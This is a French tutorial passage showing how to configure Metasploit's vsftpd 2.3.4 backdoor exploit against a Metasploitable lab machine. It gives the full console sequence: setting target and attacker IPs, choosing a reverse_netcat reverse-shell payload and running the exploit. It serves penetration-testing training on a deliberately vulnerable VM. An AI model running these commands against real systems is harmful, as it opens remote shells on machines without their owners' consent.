Configuration pratique de Metasploit
Après avoir sélectionné un exploit, vous devez configurer les paramètres, en particulier la cible et l'hôte d'écoute.
Définir les options requises
Chaque exploit nécessite au moins deux variables critiques :
- RHOSTS (Remote Hosts) : L'adresse IP de la machine cible.
- LHOST (Local Host) : L'adresse IP de l'attaquant (machine Kali Linux) vers laquelle le reverse shell se connectera.
Suite de l'exemple (attaque de Metasploitable, IP 192.168.1.50) :
msfconsole msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Définir l'IP cible
msf6 exploit(...) > set RHOSTS 192.168.1.50
Définir notre IP Kali (IP attaquant)
msf6 exploit(...) > set LHOST 192.168.1.10
Choisir le payload (souvent sélectionné automatiquement)
msf6 exploit(...) > show payloads msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_netcat
Lancer l'exploit
msf6 exploit(...) > exploit